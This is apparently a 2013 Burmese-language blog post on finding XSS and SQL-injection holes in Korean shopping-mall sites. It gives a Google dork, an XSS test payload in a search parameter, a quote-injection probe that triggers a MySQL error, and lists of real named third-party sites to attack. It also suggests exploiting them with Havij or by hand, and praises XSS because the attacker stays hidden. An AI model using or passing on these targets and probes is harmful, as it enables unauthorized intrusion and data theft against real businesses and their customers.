XSS နဲ ့ SQLi တုိ ့ ေပါင္းဖက္ေနတဲ့နည္းေလးဆုိလည္းမမွားပါဘူး..
Dork : inurl:"/mall/list.php?ca_id="
အရင္ဆုံး XSS ကုိ ေျပာျပပါ့မယ္...
Dork ကိုအသုံးျပဳ ့ျပီး လင့္တစ္ခုကိုေရြးပါ ကြ်န္ေတာ္ကေတာ့
http://okkorea119.com/mall/list.php?ca_id=3
လင့္ကို ေ၇ြးခ်ယ္လုိက္ပါတယ္..
ကဲ xss basic code ျဖစ္တဲ့ search.php?search_str=XSS ကို စမ္းထည့္ပါမယ္..
http://okkorea119.com/mall/search.php?search_str=<marquee>XSS</marquee>
ကဲျမင္ၾကမယ္ေတာ့ထင္ပါတယ္.. XSS ဆုိျပီး စာသားေလးေျပးေနပါျပီ...
ဒါက XSS ေပါက္တဲ့အပုိင္းပါ.. XSS ကိုေလ့လာပါ သင္ယူပါ ၾကိဳးစားလုပ္ပါလုိ ့ေတာ့မွာခ်င္တယ္ဗ်ာ..
ဘာလို ့လဲဆုိေတာ့ လက္သည္ မေပၚ ဘဲ ဘယ္ေကာင္သမ သြားမွန္းတာင္ မသိနုိင္တဲ့နည္းပညာ တစ္မ်ုိးမုိ ့ပါ..
အိတ္အက္အက္ နဲ ့ ေဖးရွင္းတြဲထု ရင္ အလြန္ေၾကာက္ဖု ိ့ေကာင္းပါတယ္..
စမ္းဖုိ ့ေအာက္ကလင့္ေလးေတြ ေပးလုိက္ပါတယ္...
http://okkorea119.com/mall/search.php?search_str=XSS
http://plusmind.co.kr/mall/search.php?search_str=XSS
http://hktape.co.kr/mall/search.php?search_str=XSS
http://rmbdiary.com/mall/search.php?search_str=XSS
http://jinsungdiary.com/mall/search.php?search_str=XSS
http://gallery-hw.co.kr/mall/search.php?search_str=XSS
ကဲ SQLi ကို စရေအာင္...
Dork ကိုသုံးျပီး မိမိ စိတ္ၾကိုက္ လင့္တစ္ခုကို ထပ္ယူလုိက္ပါ...
ကြ်န္ေတာ္ကေတာ့
http://www.okkorea119.com/mall/list.php?ca_id=1
ကုိယူလုိက္ပါတယ္.. ျပီးရင္ injection basic code ျဖစ္တဲ့ ' ကို ထည့္လုိက္ပါတယ္...
http://www.okkorea119.com/mall/list.php?ca_id=1'
ကဲကဲ ထြက္လာျပီ
You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near '\\)
and it_rank >= 0 and it_sell_use ='Y'' at line 2
ဒါဆုိရင္ ေဘာ္ဒါတုိ ့ Havij ကို သုံးျပီး injection ထုိးခ်င္ထုိးပါ..
ဒါမွမပာုတ္ လက္နဲ ့ ဘဲ သမခ်င္သပ့ါဆုိလည္း စိတ္ၾကိုက္တာ ခ်ပါခင္ဗ်ာ...
ကဲစမ္းဖုိ ့လင့္ေလးေတြကေတာ့
http://www.okkorea119.com/mall/list.php?ca_id=1'
http://www.dunam.co.kr/mall/list.php?ca_id=10'
http://gallery-hw.co.kr/mall/list.php?ca_id=3'
Saturday, February 2, 2013
Kosha - XSS and SQLi Vulnerability
Subscribe to:
Post Comments (Atom)





0 comments:
Post a Comment